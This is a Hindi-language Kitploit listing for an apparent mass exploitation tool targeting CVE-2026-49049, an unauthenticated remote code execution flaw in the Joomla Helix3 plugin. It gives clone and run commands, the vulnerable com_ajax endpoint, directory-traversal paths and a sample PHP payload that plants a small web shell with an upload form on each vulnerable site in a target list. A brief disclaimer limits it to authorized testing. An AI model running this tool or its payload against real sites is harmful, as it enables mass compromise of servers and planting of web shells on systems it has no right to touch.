Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-49049 — CVE-2026-49049 के लिए मास भेद्यता स्कैनर – Joomla Helix3 प्लगइन में अनप्रमाणित रिमोट कोड निष्पादन। मल्टी-थ्रेडेड, निष्पादित और रॉ PHP पेलोड दोनों का पता लगाता है। | Kitploit
उपकरण/GitHubGitHub/jenderal92/cve-2026-49049
भेद्यता स्कैनरवेब भेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubjenderal92/cve-2026-49049

CVE-2026-49049

CVE-2026-49049 के लिए मास भेद्यता स्कैनर – Joomla Helix3 प्लगइन में अनप्रमाणित रिमोट कोड निष्पादन। मल्टी-थ्रेडेड, निष्पादित और रॉ PHP पेलोड दोनों का पता लगाता है।

रिपॉजिटरी देखें
1141 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-49049 मास स्कैनर

CVE-2026-49049 के लिए मास भेद्यता स्कैनर - Joomla Helix3 Framework में बिना प्रमाणीकरण के रिमोट कोड निष्पादन (Unauthenticated Remote Code Execution)।


📌 विवरण

यह टूल कई Joomla साइटों की Helix3 प्लगइन में पाई गई CVE-2026-49049 भेद्यता के लिए जाँच करता है। यह भेद्यता एक अनप्रमाणित (unauthenticated) हमलावर को लक्षित सर्वर पर मनमाना PHP कोड अपलोड करने और निष्पादित करने की अनुमति देती है।

स्कैनर निम्नलिखित प्रयास करता है:

  1. helix3 प्लगइन के साथ com_ajax एंडपॉइंट का शोषण करना।
  2. एक हानिरहित PHP जानकारी/पेलोड फ़ाइल अपलोड करना।
  3. यह पता लगाना कि फ़ाइल निष्पादित हुई है या केवल रॉ PHP के रूप में संग्रहीत है।

⚡ विशेषताएँ

  • मास स्कैनिंग मल्टीथ्रेडिंग के साथ (डिफ़ॉल्ट रूप से 20 थ्रेड्स)।
  • दो डिटेक्शन मोड:
    • ✅ असुरक्षित (Vulnerable) – PHP कोड निष्पादित होता है (सफल RCE)।
    • ⚠️ रॉ PHP – फ़ाइल अपलोड हुई लेकिन निष्पादित नहीं हुई (कोड प्रकटीकरण)।
  • स्वचालित पेलोड जनरेशन यादृच्छिक फ़ाइल नामों के साथ।
  • आउटपुट सहेजा गया आगे के विश्लेषण के लिए अलग-अलग फ़ाइलों में।
  • हल्का और टाइमआउट हैंडलिंग के साथ तेज़।

📦 आवश्यक शर्तें

  • Python 2.7
  • requests लाइब्रेरी
root@kitploit:~
pip install requests

🛠 इंस्टॉलेशन

root@kitploit:~
git clone https://github.com/Jenderal92/CVE-2026-49049.git
cd CVE-2026-49049
chmod +x cve-2026-49049.py

🚀 उपयोग

root@kitploit:~
python2 cve-2026-49049.py targets.txt

इनपुट प्रारूप

targets.txt की प्रत्येक पंक्ति में एक डोमेन या IP होना चाहिए:

root@kitploit:~
example.com
https://example.com
http://192.168.1.100

आउटपुट फ़ाइलें

फ़ाइल विवरण results.txt वे असुरक्षित URL जहाँ पेलोड निष्पादित किया गया rez.txt वे URL जहाँ पेलोड अपलोड किया गया लेकिन निष्पादित नहीं किया गया (रॉ PHP)


उदाहरण आउटपुट

root@kitploit:~
============================================================
CVE-2026-49049 Mass Scanner
Results: results.txt (executed)
Raw PHP: rez.txt (not executed)
============================================================

[*] Loaded 150 targets
[*] Using 20 threads

[+] VULNERABLE: https://target.com
[*] RAW PHP: https://target2.com
[-] NOT VULNERABLE: https://secure.com

============================================================
[+] Selesai!
[+] Vulnerable: 12
[+] Raw PHP: 5

[+] Vulnerable URLs:
    https://target.com/tmp_123456.php.json

⚙️ कॉन्फ़िगरेशन

आप स्क्रिप्ट के अंदर निम्नलिखित चर (variables) समायोजित कर सकते हैं:

चर डिफ़ॉल्ट विवरण THREADS 20 समवर्ती थ्रेड्स की संख्या PATHS ['../../../', '../../../../'] डायरेक्टरी ट्रैवर्सल पथ TIMEOUT 5 HTTP अनुरोध टाइमआउट RESULT_FILE 'results.txt' असुरक्षित साइटों के लिए आउटपुट फ़ाइल RAW_RESULT_FILE 'rez.txt' रॉ PHP साइटों के लिए आउटपुट फ़ाइल


🧠 यह कैसे काम करता है

स्क्रिप्ट निम्नलिखित पर एक POST अनुरोध भेजती है:

root@kitploit:~
/index.php?option=com_ajax&plugin=helix3&format=json

ऐसे पेलोड के साथ जो:

  1. एक डायरेक्टरी ट्रैवर्सल पथ निर्दिष्ट करता है (जैसे, ../../../)
  2. यादृच्छिक नाम के साथ एक PHP फ़ाइल अपलोड करता है
  3. एक साधारण वेब शेल / जानकारी पेज रखता है

फिर यह जाँचता है कि फ़ाइल सुलभ है या नहीं और PHP कोड निष्पादित होता है या केवल सादे टेक्स्ट के रूप में प्रदर्शित होता है।

पेलोड उदाहरण

root@kitploit:~
<?php
$s = "Shinday";
echo '<center><pre><br><br><h1 style="color:red;">'.$s.'</h1><br>'.php_uname()."\n".'<br><br><br>';
// ... upload form
?>

⚠️ अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।

इस टूल का उन प्रणालियों के विरुद्ध अनधिकृत उपयोग, जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है, अवैध है। लेखक इस टूल के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है।

अधिक अस्वीकरण: आप Jenderal92 के कवर पर अस्वीकरण देख सकते हैं। आप इसे यहाँ देखें !!! देख सकते हैं।


टूल डाउनलोड करें